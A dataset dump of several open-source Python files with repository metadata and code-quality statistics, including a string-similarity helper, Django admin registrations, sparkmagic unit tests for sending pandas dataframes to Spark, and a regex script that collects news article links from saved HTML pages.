hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
91f0d9c124a591cedf8b9efdf61c18c07648cd7f | 400 | py | Python | linguistics/similarity/jaro_winkler.py | idin/mercurius | 48a4ed7843fb5d1946ef8051f23da7b32ab52ca3 | [
"MIT"
] | 7 | 2019-02-24T16:56:46.000Z | 2022-01-30T03:26:49.000Z | linguistics/similarity/jaro_winkler.py | idin/mercurius | 48a4ed7843fb5d1946ef8051f23da7b32ab52ca3 | [
"MIT"
] | 1 | 2020-07-14T21:00:57.000Z | 2021-02-25T07:12:11.000Z | linguistics/similarity/jaro_winkler.py | idin/linguistics | ab9568d81b225928beab353174fd97ccb0fe369c | [
"MIT"
] | null | null | null | from jellyfish import jaro_winkler as _get_jaro_winkler_similarity
def get_jaro_winkler_similarity(s1, s2, case_sensitive=True):
if not case_sensitive:
s1 = s1.lower()
s2 = s2.lower()
return _get_jaro_winkler_similarity(s1, s2)
def get_jaro_winkler_distance(s1, s2, case_sensitive=True):
return max(len(s1), len(s2))*(1-get_jaro_winkler_similarity(s1, s2, case_sensitive=case_sensitive))
| 28.571429 | 100 | 0.7925 | 64 | 400 | 4.59375 | 0.34375 | 0.22449 | 0.238095 | 0.326531 | 0.459184 | 0.37415 | 0.278912 | 0.278912 | 0 | 0 | 0 | 0.042017 | 0.1075 | 400 | 13 | 101 | 30.769231 | 0.781513 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.125 | 0.125 | 0.625 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
6207a992a3b1cfd015e086f96af31eef7c66f571 | 169 | py | Python | pgnumbra/AccProvider.py | The-Real-Ketchum-Dev/PGNumbra | bc37703abdca75691024c71590d139d6bd471b3b | [
"Apache-2.0"
] | 4 | 2018-01-18T18:27:29.000Z | 2018-03-20T22:49:23.000Z | pgnumbra/AccProvider.py | The-Real-Ketchum-Dev/PGNumbra | bc37703abdca75691024c71590d139d6bd471b3b | [
"Apache-2.0"
] | 1 | 2018-01-21T23:22:33.000Z | 2018-01-21T23:22:33.000Z | pgnumbra/AccProvider.py | SenorKarlos/PGNumbra | bc37703abdca75691024c71590d139d6bd471b3b | [
"Apache-2.0"
] | 11 | 2018-01-19T06:41:48.000Z | 2018-03-20T19:40:39.000Z | class AccProvider(object):
def get_num_accounts(self):
raise Exception("Abstract method!")
def next(self):
raise Exception("Abstract method!")
| 21.125 | 43 | 0.662722 | 19 | 169 | 5.789474 | 0.684211 | 0.163636 | 0.327273 | 0.472727 | 0.581818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.224852 | 169 | 7 | 44 | 24.142857 | 0.839695 | 0 | 0 | 0.4 | 0 | 0 | 0.189349 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
620cf3092db9df4f7dff2acc8e4d0546b64a3762 | 247 | py | Python | feedsearch_crawler/feed_spider/__init__.py | DBeath/feedsearch-crawler | 91258ecf6c7c25808ac5d4b5e1c5a7b96981bbe9 | [
"MIT"
] | 20 | 2019-11-02T18:46:11.000Z | 2022-03-18T16:22:32.000Z | feedsearch_crawler/feed_spider/__init__.py | DBeath/feedsearch-crawler | 91258ecf6c7c25808ac5d4b5e1c5a7b96981bbe9 | [
"MIT"
] | 8 | 2019-11-02T08:26:17.000Z | 2021-05-07T15:11:17.000Z | feedsearch_crawler/feed_spider/__init__.py | DBeath/feedsearch-crawler | 91258ecf6c7c25808ac5d4b5e1c5a7b96981bbe9 | [
"MIT"
] | 5 | 2020-06-18T15:44:48.000Z | 2022-02-19T14:21:47.000Z | from feedsearch_crawler.feed_spider.feed_info import FeedInfo
from feedsearch_crawler.feed_spider.site_meta import SiteMeta
from feedsearch_crawler.feed_spider.spider import FeedsearchSpider
__all__ = ["FeedsearchSpider", "FeedInfo", "SiteMeta"]
| 41.166667 | 66 | 0.8583 | 30 | 247 | 6.666667 | 0.433333 | 0.21 | 0.315 | 0.375 | 0.465 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072874 | 247 | 5 | 67 | 49.4 | 0.873362 | 0 | 0 | 0 | 0 | 0 | 0.129555 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
622429033918f53f10056f28876e3e0361e2c207 | 45 | py | Python | pentagon/migration/migrations/__init__.py | djd4352/pentagon | c5fd4dc3caf610fada378db6a4ab94beaf3a9c47 | [
"Apache-2.0"
] | 192 | 2017-05-22T21:36:19.000Z | 2019-04-12T06:51:11.000Z | pentagon/migration/migrations/__init__.py | djd4352/pentagon | c5fd4dc3caf610fada378db6a4ab94beaf3a9c47 | [
"Apache-2.0"
] | 132 | 2017-05-22T19:26:26.000Z | 2019-03-27T21:06:46.000Z | pentagon/migration/migrations/__init__.py | djd4352/pentagon | c5fd4dc3caf610fada378db6a4ab94beaf3a9c47 | [
"Apache-2.0"
] | 29 | 2017-05-22T19:21:31.000Z | 2019-03-27T19:55:35.000Z |
from pentagon.migration.migrations import *
| 15 | 43 | 0.822222 | 5 | 45 | 7.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 45 | 2 | 44 | 22.5 | 0.925 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
654dd2f9e8dd4f6fcabd926b1ce4f0c271cab311 | 159 | py | Python | blog/admin.py | leejooy96/django-simple-blog-example | d8977768e710564532d96b743f4d07539162e356 | [
"MIT"
] | 1 | 2019-11-28T05:02:59.000Z | 2019-11-28T05:02:59.000Z | blog/admin.py | leejooy96/django-simple-blog-example | d8977768e710564532d96b743f4d07539162e356 | [
"MIT"
] | 4 | 2021-03-18T21:52:07.000Z | 2021-06-10T17:56:29.000Z | blog/admin.py | leejooy96/django-simple-blog | d8977768e710564532d96b743f4d07539162e356 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Post, Comment, Config
admin.site.register(Post)
admin.site.register(Comment)
admin.site.register(Config)
| 22.714286 | 41 | 0.811321 | 23 | 159 | 5.608696 | 0.478261 | 0.209302 | 0.395349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08805 | 159 | 6 | 42 | 26.5 | 0.889655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
65568ac32bad7433f7f7f0192e0464de2632f484 | 9 | py | Python | carla_utils/utils/npc_bind.py | IamWangYunKai/DG-TrajGen | 0a8aab7e1c05111a5afe43d53801c55942e9ff56 | [
"MIT"
] | 31 | 2021-09-15T00:43:43.000Z | 2022-03-27T22:57:21.000Z | carla_utils/utils/npc_bind.py | zhangdongkun98/carla-utils | a370db53589841c8cffe95c8df43dfc036176431 | [
"MIT"
] | 1 | 2021-12-09T03:08:13.000Z | 2021-12-15T07:08:31.000Z | carla_utils/utils/npc_bind.py | zhangdongkun98/carla-utils | a370db53589841c8cffe95c8df43dfc036176431 | [
"MIT"
] | 2 | 2021-11-26T05:45:18.000Z | 2022-01-19T12:46:41.000Z |
# TODO | 2.25 | 6 | 0.444444 | 1 | 9 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.444444 | 9 | 4 | 6 | 2.25 | 0.8 | 0.444444 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0.25 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
659d2d0c6500a4aec2d021f38440310a02fb5a22 | 87 | py | Python | gateway/can/message.py | aceofwings/Cantactular | a6eb8d7128fd1388d3e75c1a8415123d1d5930e1 | [
"MIT"
] | 3 | 2017-01-26T01:37:42.000Z | 2018-07-22T02:42:52.000Z | gateway/can/message.py | aceofwings/Cantactular | a6eb8d7128fd1388d3e75c1a8415123d1d5930e1 | [
"MIT"
] | 1 | 2017-07-07T18:02:20.000Z | 2017-07-07T18:02:20.000Z | gateway/can/message.py | aceofwings/Evt-Gateway | a6eb8d7128fd1388d3e75c1a8415123d1d5930e1 | [
"MIT"
] | null | null | null |
class Message(object):
def init():
pass
def toBytes():
pass
| 9.666667 | 22 | 0.494253 | 9 | 87 | 4.777778 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.402299 | 87 | 8 | 23 | 10.875 | 0.826923 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | true | 0.4 | 0 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
65ee4321dbbdae76b52f3688f7c3760d351e91ff | 41 | py | Python | tcxparser/__init__.py | davidpch/python-tcxparser | 0b3d2bd4993b733d95b9bc2dd7368c6d462f905c | [
"BSD-2-Clause"
] | 73 | 2015-01-12T15:11:13.000Z | 2021-12-30T13:44:16.000Z | tcxparser/__init__.py | davidpch/python-tcxparser | 0b3d2bd4993b733d95b9bc2dd7368c6d462f905c | [
"BSD-2-Clause"
] | 54 | 2015-12-31T02:05:50.000Z | 2022-02-22T04:45:15.000Z | tcxparser/__init__.py | davidpch/python-tcxparser | 0b3d2bd4993b733d95b9bc2dd7368c6d462f905c | [
"BSD-2-Clause"
] | 56 | 2015-02-14T21:12:21.000Z | 2022-01-18T08:00:12.000Z | from .tcxparser import TCXParser # noqa
| 20.5 | 40 | 0.780488 | 5 | 41 | 6.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170732 | 41 | 1 | 41 | 41 | 0.941176 | 0.097561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
02e28250f1a1bb8c38fcdaacd14c9037c089d293 | 31 | py | Python | sakdas_v052021/sakdas/__init__.py | sakdaloe/sakdas_dm | 309551745976521db0b8fc9379b0675093e11b5d | [
"CC0-1.0"
] | 1 | 2021-08-01T04:08:48.000Z | 2021-08-01T04:08:48.000Z | sakdas_v052021/sakdas/__init__.py | sakdaloe/sakdas_dm | 309551745976521db0b8fc9379b0675093e11b5d | [
"CC0-1.0"
] | null | null | null | sakdas_v052021/sakdas/__init__.py | sakdaloe/sakdas_dm | 309551745976521db0b8fc9379b0675093e11b5d | [
"CC0-1.0"
] | null | null | null | from sakdas.Sakdas import Sakda | 31 | 31 | 0.870968 | 5 | 31 | 5.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 31 | 1 | 31 | 31 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f303e369b7894e7c8bc8cb9025061843df8387e3 | 6,674 | py | Python | sparkmagic/sparkmagic/tests/test_sendpandasdftosparkcommand.py | sciserver/sparkmagic | ac0852cbe88a41faa368cf1e1c89045a2de973bf | [
"RSA-MD"
] | 1,141 | 2015-09-21T20:52:00.000Z | 2022-03-31T14:15:51.000Z | sparkmagic/sparkmagic/tests/test_sendpandasdftosparkcommand.py | sciserver/sparkmagic | ac0852cbe88a41faa368cf1e1c89045a2de973bf | [
"RSA-MD"
] | 605 | 2015-09-23T23:27:43.000Z | 2022-03-16T07:46:52.000Z | sparkmagic/sparkmagic/tests/test_sendpandasdftosparkcommand.py | sciserver/sparkmagic | ac0852cbe88a41faa368cf1e1c89045a2de973bf | [
"RSA-MD"
] | 442 | 2015-09-23T21:31:28.000Z | 2022-03-13T15:19:57.000Z | # coding=utf-8
import pandas as pd
from mock import MagicMock
from sparkmagic.livyclientlib.exceptions import BadUserDataException
from nose.tools import assert_raises, assert_equals
from sparkmagic.livyclientlib.command import Command
import sparkmagic.utils.constants as constants
from sparkmagic.livyclientlib.sendpandasdftosparkcommand import SendPandasDfToSparkCommand
def test_send_to_scala():
input_variable_name = 'input'
input_variable_value = pd.DataFrame({'A': [1], 'B' : [2]})
output_variable_name = 'output'
maxrows = 1
sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, maxrows)
sparkcommand._scala_command = MagicMock(return_value=MagicMock())
sparkcommand.to_command(constants.SESSION_KIND_SPARK, input_variable_name, input_variable_value, output_variable_name)
sparkcommand._scala_command.assert_called_with(input_variable_name, input_variable_value, output_variable_name)
def test_send_to_r():
input_variable_name = 'input'
input_variable_value = pd.DataFrame({'A': [1], 'B' : [2]})
output_variable_name = 'output'
maxrows = 1
sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, maxrows)
sparkcommand._r_command = MagicMock(return_value=MagicMock())
sparkcommand.to_command(constants.SESSION_KIND_SPARKR, input_variable_name, input_variable_value, output_variable_name)
sparkcommand._r_command.assert_called_with(input_variable_name, input_variable_value, output_variable_name)
def test_send_to_python():
input_variable_name = 'input'
input_variable_value = pd.DataFrame({'A': [1], 'B' : [2]})
output_variable_name = 'output'
maxrows = 1
sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, maxrows)
sparkcommand._pyspark_command = MagicMock(return_value=MagicMock())
sparkcommand.to_command(constants.SESSION_KIND_PYSPARK, input_variable_name, input_variable_value, output_variable_name)
sparkcommand._pyspark_command.assert_called_with(input_variable_name, input_variable_value, output_variable_name)
def test_should_create_a_valid_scala_expression():
input_variable_name = "input"
input_variable_value = pd.DataFrame({'A': [1], 'B' : [2]})
output_variable_name = "output"
pandas_df_jsonized = u'''[{"A":1,"B":2}]'''
expected_scala_code = u'''
val rdd_json_array = spark.sparkContext.makeRDD("""{}""" :: Nil)
val {} = spark.read.json(rdd_json_array)'''.format(pandas_df_jsonized, output_variable_name)
sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, 1)
assert_equals(sparkcommand._scala_command(input_variable_name, input_variable_value, output_variable_name),
Command(expected_scala_code))
def test_should_create_a_valid_r_expression():
input_variable_name = "input"
input_variable_value = pd.DataFrame({'A': [1], 'B' : [2]})
output_variable_name = "output"
pandas_df_jsonized = u'''[{"A":1,"B":2}]'''
expected_r_code = u'''
fileConn<-file("temporary_pandas_df_sparkmagics.txt")
writeLines('{}', fileConn)
close(fileConn)
{} <- read.json("temporary_pandas_df_sparkmagics.txt")
{}.persist()
file.remove("temporary_pandas_df_sparkmagics.txt")'''.format(pandas_df_jsonized, output_variable_name, output_variable_name)
sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, 1)
assert_equals(sparkcommand._r_command(input_variable_name, input_variable_value, output_variable_name),
Command(expected_r_code))
def test_should_create_a_valid_python3_expression():
input_variable_name = "input"
input_variable_value = pd.DataFrame({'A': [1], 'B' : [2]})
output_variable_name = "output"
pandas_df_jsonized = u'''[{"A":1,"B":2}]'''
expected_python3_code = SendPandasDfToSparkCommand._python_decode
expected_python3_code += u'''
json_array = json_loads_byteified('{}')
rdd_json_array = spark.sparkContext.parallelize(json_array)
{} = spark.read.json(rdd_json_array)'''.format(pandas_df_jsonized, output_variable_name)
sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, 1)
assert_equals(sparkcommand._pyspark_command(input_variable_name, input_variable_value, output_variable_name),
Command(expected_python3_code))
def test_should_create_a_valid_python2_expression():
input_variable_name = "input"
input_variable_value = pd.DataFrame({'A': [1], 'B' : [2]})
output_variable_name = "output"
pandas_df_jsonized = u'''[{"A":1,"B":2}]'''
expected_python2_code = SendPandasDfToSparkCommand._python_decode
expected_python2_code += u'''
json_array = json_loads_byteified('{}')
rdd_json_array = spark.sparkContext.parallelize(json_array)
{} = spark.read.json(rdd_json_array)'''.format(pandas_df_jsonized, output_variable_name)
sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, 1)
assert_equals(sparkcommand._pyspark_command(input_variable_name, input_variable_value, output_variable_name),
Command(expected_python2_code))
def test_should_properly_limit_pandas_dataframe():
input_variable_name = "input"
max_rows = 1
input_variable_value = pd.DataFrame({'A': [0, 1, 2, 3, 4], 'B' : [5, 6, 7, 8, 9]})
output_variable_name = "output"
pandas_df_jsonized = u'''[{"A":0,"B":5}]''' #notice we expect json to have dropped all but one row
expected_scala_code = u'''
val rdd_json_array = spark.sparkContext.makeRDD("""{}""" :: Nil)
val {} = spark.read.json(rdd_json_array)'''.format(pandas_df_jsonized, output_variable_name)
sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, max_rows)
assert_equals(sparkcommand._scala_command(input_variable_name, input_variable_value, output_variable_name),
Command(expected_scala_code))
def test_should_raise_when_input_is_not_pandas_df():
input_variable_name = "input"
input_variable_value = "not a pandas dataframe"
output_variable_name = "output"
sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, 1)
assert_raises(BadUserDataException, sparkcommand.to_command, "spark", input_variable_name, input_variable_value, output_variable_name)
| 52.140625 | 138 | 0.761163 | 819 | 6,674 | 5.750916 | 0.130647 | 0.168153 | 0.13758 | 0.140127 | 0.833121 | 0.792144 | 0.781953 | 0.750106 | 0.750106 | 0.741189 | 0 | 0.009011 | 0.135301 | 6,674 | 127 | 139 | 52.551181 | 0.807139 | 0.009739 | 0 | 0.557692 | 0 | 0 | 0.158492 | 0.072813 | 0 | 0 | 0 | 0 | 0.096154 | 1 | 0.086538 | false | 0 | 0.067308 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f30a7382eac03348c3a2b2155f24be38237a910b | 152 | py | Python | itdagene/app/feedback/admin.py | itdagene-ntnu/itdagene | b972cd3d803debccebbc33641397a39834b8d69a | [
"MIT"
] | 9 | 2018-10-17T20:58:09.000Z | 2021-12-16T16:16:45.000Z | itdagene/app/feedback/admin.py | itdagene-ntnu/itdagene | b972cd3d803debccebbc33641397a39834b8d69a | [
"MIT"
] | 177 | 2018-10-27T18:15:56.000Z | 2022-03-28T04:29:06.000Z | itdagene/app/feedback/admin.py | itdagene-ntnu/itdagene | b972cd3d803debccebbc33641397a39834b8d69a | [
"MIT"
] | null | null | null | from django.contrib import admin
from itdagene.app.feedback.models import Evaluation, Issue
admin.site.register(Issue)
admin.site.register(Evaluation)
| 25.333333 | 58 | 0.835526 | 21 | 152 | 6.047619 | 0.619048 | 0.15748 | 0.220472 | 0.346457 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078947 | 152 | 5 | 59 | 30.4 | 0.907143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
b843c84d0ad8af31b9637be180ccf45663393069 | 2,386 | py | Python | crawler/manual/news/missed_journals/google_links.py | bromjiri/Presto | e5790f60d0935bb1182f676db414b0724ba35c1b | [
"MIT"
] | null | null | null | crawler/manual/news/missed_journals/google_links.py | bromjiri/Presto | e5790f60d0935bb1182f676db414b0724ba35c1b | [
"MIT"
] | null | null | null | crawler/manual/news/missed_journals/google_links.py | bromjiri/Presto | e5790f60d0935bb1182f676db414b0724ba35c1b | [
"MIT"
] | null | null | null | import re
# input
date = "2016-11-11"
output_file = date + "/links.txt"
write_output = open(output_file, "a")
# bbc
journal = "bbc"
for i in range(1, 4):
file = date + "/" + journal + "/" + journal + str(i) + ".html"
print(file)
with open(file, "r") as f:
for line in f:
# print(line)
matches = re.findall(r"http://www.bbc.co.uk/news/[A-Za-z0-9\-]*", line)
if matches:
unique = set(matches)
for u in unique:
write_output.write(u + "\n")
# theguardian
journal = "theguardian"
for i in range(1, 4):
file = date + "/" + journal + "/" + journal + str(i) + ".html"
print(file)
with open(file, "r") as f:
for line in f:
# print(line)
matches = re.findall(r"https://www.theguardian.com[A-Za-z0-9\-/]*", line)
if matches:
unique = set(matches)
for u in unique:
write_output.write(u + "\n")
# cnbc
journal = "cnbc"
for i in range(1, 4):
file = date + "/" + journal + "/" + journal + str(i) + ".html"
print(file)
try:
with open(file, "r") as f:
for line in f:
# print(line)
matches = re.findall(r"http://www.cnbc.com.*?html", line)
if matches:
unique = set(matches)
for u in unique:
write_output.write(u + "\n")
except Exception as e:
continue
# latimes
journal = "latimes"
for i in range(1, 4):
file = date + "/" + journal + "/" + journal + str(i) + ".html"
print(file)
with open(file, "r") as f:
for line in f:
# print(line)
matches = re.findall(r"http://www.latimes.com.*?html", line)
if matches:
unique = set(matches)
for u in unique:
write_output.write(u + "\n")
# nytimes
journal = "nytimes"
for i in range(1, 4):
file = date + "/" + journal + "/" + journal + str(i) + ".html"
print(file)
with open(file, "r") as f:
for line in f:
# print(line)
matches = re.findall(r"http://www.nytimes.com.*?html", line)
if matches:
unique = set(matches)
for u in unique:
write_output.write(u + "\n")
